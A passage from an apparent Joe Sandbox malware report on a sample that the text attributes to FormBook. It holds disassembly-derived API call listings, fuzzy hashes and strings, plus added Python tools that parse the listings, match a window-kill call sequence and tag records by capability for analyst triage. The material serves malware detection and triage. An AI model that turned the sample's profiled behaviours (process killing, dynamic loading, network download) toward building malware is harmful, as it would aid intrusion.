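        sub = m.group("sub")
        calls.append(ApiCall(m.group("fn"), m.group("mod"), args,
                             int(m.group("ref"), 16), int(sub, 16) if sub else None))
    return calls


# Standard Win32 constants, keyed by (function, 0-based argument index).
# Hypothetical table built for this page; extend it for other APIs.
ENUMS = {
    ("PostMessageW", 1): {0x10: "WM_CLOSE", 0x111: "WM_COMMAND"},
    ("SendMessageTimeoutW", 1): {0x10: "WM_CLOSE"},
    ("SendMessageTimeoutW", 4): {0x2: "SMTO_ABORTIFHUNG"},
    ("OpenProcess", 0): {0x1F0FFF: "PROCESS_ALL_ACCESS"},   # pre-Vista value
    ("ShowWindow", 1): {0: "SW_HIDE", 4: "SW_SHOWNOACTIVATE"},
    ("GetDeviceCaps", 1): {0x58: "LOGPIXELSX", 0x5A: "LOGPIXELSY"},
    ("GetTokenInformation", 1): {2: "TokenGroups"},
    ("mouse_event", 0): {0x8001: "MOUSEEVENTF_MOVE|MOUSEEVENTF_ABSOLUTE"},
    ("MapVirtualKeyW", 0): {0x10: "VK_SHIFT", 0x11: "VK_CONTROL", 0x12: "VK_MENU",
                            0x5B: "VK_LWIN", 0xA0: "VK_LSHIFT", 0xA1: "VK_RSHIFT"},
    ("MapVirtualKeyW", 1): {0: "MAPVK_VK_TO_VSC"},
}
# Argument positions that are millisecond timeouts.
TIMEOUT_MS = {("SendMessageTimeoutW", 5), ("WaitForSingleObject", 1)}


def annotate(call: ApiCall) -> str:
    """Render a call with known constants replaced by their symbolic names."""
    parts = []
    for i, v in enumerate(call.args):
        key = (call.fn, i)
        if v is None:
            parts.append("?")
        elif key in ENUMS and v in ENUMS[key]:
            parts.append(ENUMS[key][v])
        elif key in TIMEOUT_MS:
            parts.append(f"{v} ms")
        else:
            parts.append(f"0x{v:X}")
    return f"{call.fn}({', '.join(parts)}) @ {call.ref:08X}"


def matches_sequence(calls: list, pattern: list) -> bool:
    """True if pattern, a list of (fn, {arg_index: value}), occurs in order,
    possibly interleaved with other calls. Sub-call lines are ignored."""
    it = iter(c for c in calls if c.subcall is None)
    for fn, want in pattern:
        for c in it:
            if c.fn == fn and all(i < len(c.args) and c.args[i] == v
                                  for i, v in want.items()):
                break
        else:
            return False
    return True


# Polite close, short wait, then hard kill of the window's owning process.
WINDOW_KILL = [
    ("PostMessageW", {1: 0x10}),
    ("SendMessageTimeoutW", {1: 0x10}),
    ("GetWindowThreadProcessId", {}),
    ("OpenProcess", {0: 0x1F0FFF}),
    ("TerminateProcess", {}),
]

# Sample input: lines copied from the listing above plus one MapVirtualKeyW line.
SAMPLE = """\
• PostMessageW.USER32(?,00000010,00000000,00000000), ref: 008353F9
• SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0083540F
• GetWindowThreadProcessId.USER32(?,?), ref: 0083541E
• OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0083542D
• TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00835437
• CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0083543E
• MapVirtualKeyW.USER32(0000005B,00000000), ref: 007F0193
"""

if __name__ == "__main__":
    parsed = parse_listing(SAMPLE)
    for c in parsed:
        print(annotate(c))
    print("window-kill idiom:", matches_sequence(parsed, WINDOW_KILL))
```

Treat the annotations as hints, not facts: a captured value is only meaningful at a real parameter position, so check the function's prototype before reading anything into the trailing arguments, and a "?" at a position that matters (the window handle here) means the pattern match cannot tell which window was targeted.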
                                                      APIs
                                                      • InterlockedExchange.KERNEL32(?,?), ref: 00837243
                                                      • EnterCriticalSection.KERNEL32(?,?,007E0EE4,?,?), ref: 00837254
                                                      • TerminateThread.KERNEL32(00000000,000001F6,?,007E0EE4,?,?), ref: 00837261
                                                      • WaitForSingleObject.KERNEL32(00000000,000003E8,?,007E0EE4,?,?), ref: 0083726E
                                                        • Part of subcall function 00836C35: CloseHandle.KERNEL32(00000000,?,0083727B,?,007E0EE4,?,?), ref: 00836C3F
                                                      • InterlockedExchange.KERNEL32(?,000001F6), ref: 00837281
                                                      • LeaveCriticalSection.KERNEL32(?,?,007E0EE4,?,?), ref: 00837288
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                       • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                      • String ID:
                                                      • API String ID: 3495660284-0
                                                      • Opcode ID: b1f53bf2663d7056870364da5b4c106c2cf4854a12a41162e47f817cff1162e5
                                                      • Instruction ID: cb7fc04a781f8b9f9c9768dd8dd30043ce237a6193d4ff7e41bc0d5104078ba8
                                                      • Opcode Fuzzy Hash: b1f53bf2663d7056870364da5b4c106c2cf4854a12a41162e47f817cff1162e5
                                                      • Instruction Fuzzy Hash: 3EF05EB6541712EBEB122B64ED4C9DB772AFF45703F500531F603914A2DB7A5815CB90
                                                      APIs
                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0082899D
                                                      • UnloadUserProfile.USERENV(?,?), ref: 008289A9
                                                      • CloseHandle.KERNEL32(?), ref: 008289B2
                                                      • CloseHandle.KERNEL32(?), ref: 008289BA
                                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 008289C3
                                                      • HeapFree.KERNEL32(00000000), ref: 008289CA
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                       • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                      • String ID:
                                                      • API String ID: 146765662-0
                                                      • Opcode ID: 079179bdc16e91850151e3be98c6c041c826c63b0a67a3328f96a4e6d371dbb5
                                                      • Instruction ID: 4dbc0c80f970eb709fd5b187118ba4637ec762263d90b2b7a558a1a8551761de
                                                      • Opcode Fuzzy Hash: 079179bdc16e91850151e3be98c6c041c826c63b0a67a3328f96a4e6d371dbb5
                                                      • Instruction Fuzzy Hash: 00E0C236044601FBDA022FE1EC0C94ABB69FB89323B508230F31981571CB3AA420DB50
                                                      APIs
                                                      • VariantInit.OLEAUT32(?), ref: 00848613
                                                      • CharUpperBuffW.USER32(?,?), ref: 00848722
                                                      • VariantClear.OLEAUT32(?), ref: 0084889A
                                                        • Part of subcall function 00837562: VariantInit.OLEAUT32(00000000), ref: 008375A2
                                                        • Part of subcall function 00837562: VariantCopy.OLEAUT32(00000000,?), ref: 008375AB
                                                        • Part of subcall function 00837562: VariantClear.OLEAUT32(00000000), ref: 008375B7
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                       • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                      • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                      • API String ID: 4237274167-1221869570
                                                      • Opcode ID: 54c90048df8bd7b0bead9c0eb2e5a10d6949d857457cb66aea3ec55ef4cc3dd3
                                                      • Instruction ID: d1aa850d4c034bfcf42816f097b9bb13bfac031b5675ad27d6cec42bae34caf3
                                                      • Opcode Fuzzy Hash: 54c90048df8bd7b0bead9c0eb2e5a10d6949d857457cb66aea3ec55ef4cc3dd3
                                                      • Instruction Fuzzy Hash: CB912471604309DFC710DF28C48495ABBE4FB89714F14892EF99ADB361DB34E945CB92
                                                      APIs
                                                        • Part of subcall function 007EFC86: _wcscpy.LIBCMT ref: 007EFCA9
                                                      • _memset.LIBCMT ref: 00832B87
                                                      • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00832BB6
                                                      • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00832C69
                                                      • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00832C97
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                       • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                      • String ID: 0
                                                      • API String ID: 4152858687-4108050209
                                                      • Opcode ID: c31f39fdf258c6f9df640c19f61e70a234b830c9d1c949e5876fcc666d426022
                                                      • Instruction ID: 797411052bfb9327ad52dde67cae9e85b82c48c66f1d847ebbce66c740f272c6
                                                      • Opcode Fuzzy Hash: c31f39fdf258c6f9df640c19f61e70a234b830c9d1c949e5876fcc666d426022
                                                      • Instruction Fuzzy Hash: D351DC716083109BDB25AF28D849A6FB7E8FFC8320F141A2DF991D2291DB74CD0687D2
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                       • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: _memmove$_free
                                                      • String ID: 3c~$_~
                                                      • API String ID: 2620147621-657907094
                                                      • Opcode ID: 34229b0c0a972dab3dc09ca0fce4f7ae142bd6e98539abad847b4ba2b2c28c5f
                                                      • Instruction ID: 85e0b009324fe91273c52e07f442752bd496bb539dd9e2937ab500e45b979afb
                                                      • Opcode Fuzzy Hash: 34229b0c0a972dab3dc09ca0fce4f7ae142bd6e98539abad847b4ba2b2c28c5f
                                                      • Instruction Fuzzy Hash: B8517C716053818FDB25CF29C844B6ABBE5FF8A314F44492DE989C7391EB35E941CB82
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                       • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: _memset$_memmove
                                                      • String ID: 3c~$ERCP
                                                      • API String ID: 2532777613-2728011545
                                                      • Opcode ID: f79fe18a2ee187d2bd9e39bc6155d4fea9085e7339def0d911e93ea09f0c5cd1
                                                      • Instruction ID: bf045732bba35c5c91a11facc0aa42ad973ea9188c6e690aea52b6bccfc9a046
                                                      • Opcode Fuzzy Hash: f79fe18a2ee187d2bd9e39bc6155d4fea9085e7339def0d911e93ea09f0c5cd1
                                                      • Instruction Fuzzy Hash: 3951D270901309DBDB24DFA6C8457AAB7F8FF18344F20856EEA4AD7241E774EA84CB40
                                                      APIs
                                                      • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0082D5D4
                                                      • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0082D60A
                                                      • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0082D61B
                                                      • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 0082D69D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                       • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: ErrorMode$AddressCreateInstanceProc
                                                      • String ID: DllGetClassObject
                                                      • API String ID: 753597075-1075368562
                                                      • Opcode ID: 281a39c1eb414920077fa7ecc0e252271219883e322727f64fb739cdb3315adb
                                                      • Instruction ID: efac2032f6df9bf25b652d613c6b89eb39af91266c1328f349f0b66cd052796b
                                                      • Opcode Fuzzy Hash: 281a39c1eb414920077fa7ecc0e252271219883e322727f64fb739cdb3315adb
                                                      • Instruction Fuzzy Hash: 08419BB1600324EFDB05CF64D884A9ABFAAFF54314F1180A9AD09DF206D7B4D984CBE0
                                                      APIs
                                                      • _memset.LIBCMT ref: 008327C0
                                                      • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 008327DC
                                                      • DeleteMenu.USER32(?,00000007,00000000), ref: 00832822
                                                      • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00895890,00000000), ref: 0083286B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                       • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: Menu$Delete$InfoItem_memset
                                                      • String ID: 0
                                                      • API String ID: 1173514356-4108050209
                                                      • Opcode ID: c04018cbf56abe6e02798b803221a19264bc38bdee09d6e0bfaa9bf7b40618a9
                                                      • Instruction ID: 51686cc8dac8b1a07c7305dc1e0960a7106e2b754e1535b8c34ffb1dece1805b
                                                      • Opcode Fuzzy Hash: c04018cbf56abe6e02798b803221a19264bc38bdee09d6e0bfaa9bf7b40618a9
                                                      • Instruction Fuzzy Hash: D6418E702043419FD724DF28C844B2ABBE9FFC5314F14492EF9A6D7292D734A905CB92
                                                      APIs
                                                      • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0084D7C5
                                                        • Part of subcall function 007D784B: _memmove.LIBCMT ref: 007D7899
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                       • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: BuffCharLower_memmove
                                                      • String ID: cdecl$none$stdcall$winapi
                                                      • API String ID: 3425801089-567219261
                                                      • Opcode ID: 42246af9940a99a92177c573e8f0aa7b667c2b0a3a042ba8e700d7995bb94a44
                                                      • Instruction ID: 1859de0b381d3f23409f241b948801350727a09e4908c78605dfabfe25bec2dd
                                                      • Opcode Fuzzy Hash: 42246af9940a99a92177c573e8f0aa7b667c2b0a3a042ba8e700d7995bb94a44
                                                      • Instruction Fuzzy Hash: 1E318B7190461DEBCF00EF58C8559BEB3B5FF14320B108A2AE865E77D2DB75A905CB80
                                                      APIs
                                                        • Part of subcall function 007D7DE1: _memmove.LIBCMT ref: 007D7E22
                                                        • Part of subcall function 0082AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0082AABC
                                                      • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00828F14
                                                      • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00828F27
                                                      • SendMessageW.USER32(?,00000189,?,00000000), ref: 00828F57
                                                        • Part of subcall function 007D7BCC: _memmove.LIBCMT ref: 007D7C06
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                       • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$_memmove$ClassName
                                                      • String ID: ComboBox$ListBox
                                                      • API String ID: 365058703-1403004172
                                                      • Opcode ID: 6f2b52fd981786c536c9389e4977d77f154934c242b042f1c532dee00f0dfe86
                                                      • Instruction ID: 49aaa18bb2582b0f1fe721b5ecc4657f29a5172ac65e4019330b2c1b718b74b6
                                                      • Opcode Fuzzy Hash: 6f2b52fd981786c536c9389e4977d77f154934c242b042f1c532dee00f0dfe86
                                                      • Instruction Fuzzy Hash: 7C21E171A01108FADF18ABB4DC89CFFB7B9EF05320F14412AF821A72E1DE395849D610
                                                      APIs
                                                      • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0084184C
                                                      • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00841872
                                                      • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 008418A2
                                                      • InternetCloseHandle.WININET(00000000), ref: 008418E9
                                                        • Part of subcall function 00842483: GetLastError.KERNEL32(?,?,00841817,00000000,00000000,00000001), ref: 00842498
                                                        • Part of subcall function 00842483: SetEvent.KERNEL32(?,?,00841817,00000000,00000000,00000001), ref: 008424AD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                       • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                      • String ID:
                                                      • API String ID: 3113390036-3916222277
                                                      • Opcode ID: a46addc27bd1997a8510b02caefcd03711bd4702d66b967d23ce10bee7969aef
                                                      • Instruction ID: cfae0e0de7dd00b63736fb9403150c41cd72c8cd27447302d24c0794475cef9e
                                                      • Opcode Fuzzy Hash: a46addc27bd1997a8510b02caefcd03711bd4702d66b967d23ce10bee7969aef
                                                      • Instruction Fuzzy Hash: 2C21BBB150030CBFEB119B64CC89EBB7BEDFB88749F10413AF905E3240EA288D4497A1
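The record above is the one function in this listing that touches WININET (InternetOpenUrlW, HttpSendRequestW, HttpQueryInfoW), and it sits next to records carrying AutoIt runtime strings (AUTOIT.ERROR, cdecl/stdcall/winapi, ComboBox/ListBox), so it is most plausibly the interpreter's own download routine rather than script logic; a capability hit here tells you what the embedded runtime can do, not what the script calls. The parser below is an added example, not part of the Joe Sandbox report or its IDA plugin output: it reads function records in exactly the format shown on this page, splits direct calls from "Part of subcall function" calls (which belong to a callee and would otherwise inflate every caller's profile), and buckets records into capability tags so an analyst can pick out the few worth opening in the disassembler and carry their Instruction Fuzzy Hash along for matching against other reports. The tag tables are my own assumptions, the `$` separator in String ID is inferred from the records on this page, and the sample input is constructed from three of the records above, trimmed to the lines the parser uses.

```python
from __future__ import annotations
import re
from dataclasses import dataclass, field
from typing import Optional

# Constructed sample input: three function records copied from the listing above,
# trimmed to the sections the parser reads.
SAMPLE = """\
APIs
• InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0084184C
• HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00841872
• HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 008418A2
• InternetCloseHandle.WININET(00000000), ref: 008418E9
  • Part of subcall function 00842483: GetLastError.KERNEL32(?,?,00841817,00000000,00000000,00000001), ref: 00842498
  • Part of subcall function 00842483: SetEvent.KERNEL32(?,?,00841817,00000000,00000000,00000001), ref: 008424AD
Strings
Memory Dump Source
• Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
Similarity
• API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
• String ID:
• API String ID: 3113390036-3916222277
• Instruction Fuzzy Hash: 2C21BBB150030CBFEB119B64CC89EBB7BEDFB88749F10413AF905E3240EA288D4497A1
APIs
• InterlockedExchange.KERNEL32(?,?), ref: 00837243
• TerminateThread.KERNEL32(00000000,000001F6,?,007E0EE4,?,?), ref: 00837261
  • Part of subcall function 00836C35: CloseHandle.KERNEL32(00000000,?,0083727B,?,007E0EE4,?,?), ref: 00836C3F
Similarity
• API String ID: 3495660284-0
• Instruction Fuzzy Hash: 3EF05EB6541712EBEB122B64ED4C9DB772AFF45703F500531F603914A2DB7A5815CB90
APIs
  • Part of subcall function 007EFC86: _wcscpy.LIBCMT ref: 007EFCA9
• _memset.LIBCMT ref: 00832B87
• SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00832C97
Similarity
• String ID: 0
• API String ID: 4152858687-4108050209
"""

API_RE = re.compile(
    r"^(?:Part of subcall function ([0-9A-Fa-f]{8}): )?"  # present when the call is one level down
    r"(\w+)\.(\w+)(?:\((.*)\),)? ref: ([0-9A-Fa-f]{8})$"  # Name.MODULE(args), ref: call site (LIBCMT lines have no args)
)
KV_RE = re.compile(r"^([^:]+):\s*(.*)$")
SECTIONS = {"Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}

# Assumed capability buckets for triage (my own choice, not from the report); extend as needed.
MODULE_TAGS = {"WININET": "network", "WINHTTP": "network", "WS2_32": "network"}
API_TAGS = {"TerminateThread": "thread-control", "TerminateProcess": "thread-control",
            "CoCreateInstance": "dynamic-loading", "GetProcAddress": "dynamic-loading",
            "LoadLibraryW": "dynamic-loading", "CreatePipe": "stdio-redirect",
            "GetStdHandle": "stdio-redirect", "UnloadUserProfile": "user-context"}

@dataclass
class ApiCall:
    name: str
    module: str
    args: str
    ref: str
    subcall_of: Optional[str]  # callee address when the API is only reached through a subcall

@dataclass
class FunctionRecord:
    apis: list = field(default_factory=list)
    strings: list = field(default_factory=list)
    api_string_id: str = ""
    instruction_fuzzy_hash: str = ""

def parse_records(text: str) -> list:
    """One FunctionRecord per 'APIs' block; only the APIs and Similarity sections are read."""
    records, section = [], None
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()
        if line == "APIs":
            records.append(FunctionRecord())
            section = "APIs"
            continue
        if line in SECTIONS:
            section = line
            continue
        if not records or not line:
            continue
        rec = records[-1]
        if section == "APIs":
            m = API_RE.match(line)
            if m:
                sub, name, module, args, ref = m.groups()
                rec.apis.append(ApiCall(name, module, args or "", ref, sub))
        elif section == "Similarity":
            m = KV_RE.match(line)
            if not m:
                continue
            key, value = m.group(1), m.group(2)
            if key == "String ID" and value:
                rec.strings = value.split("$")  # '$' separator inferred from the records on this page
            elif key == "API String ID":
                rec.api_string_id = value
            elif key == "Instruction Fuzzy Hash":
                rec.instruction_fuzzy_hash = value
    return records

def classify(rec: FunctionRecord, include_subcalls: bool = False) -> set:
    """Capability tags for a record; subcall APIs are skipped unless asked for."""
    tags = set()
    for call in rec.apis:
        if call.subcall_of and not include_subcalls:
            continue
        tags.update(t for t in (MODULE_TAGS.get(call.module), API_TAGS.get(call.name)) if t)
    return tags

def triage(text: str) -> list:
    """Records that hit at least one bucket, with the fields an analyst pivots on."""
    rows = []
    for rec in parse_records(text):
        tags = classify(rec)
        if tags:
            rows.append({"api_string_id": rec.api_string_id, "tags": sorted(tags),
                         "fuzzy_hash": rec.instruction_fuzzy_hash,
                         "direct_calls": [c.name for c in rec.apis if not c.subcall_of]})
    return rows

if __name__ == "__main__":
    for row in triage(SAMPLE):
        print(row)
```

Run against the full function listing of a report (not just these three records) the output is short enough to read by hand; in this sample the menu-handling record produces no row at all, which is the point of bucketing. Whatever the tags say, the decisive evidence for FormBook in this report is in the injection and credential-theft signatures, not in the AutoIt runtime's download helper.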
                                                      APIs
                                                        • Part of subcall function 007D1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 007D1D73
                                                        • Part of subcall function 007D1D35: GetStockObject.GDI32(00000011), ref: 007D1D87
                                                        • Part of subcall function 007D1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 007D1D91
                                                      • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00856461
                                                      • LoadLibraryW.KERNEL32(?), ref: 00856468
                                                      • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 0085647D
                                                      • DestroyWindow.USER32(?), ref: 00856485
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
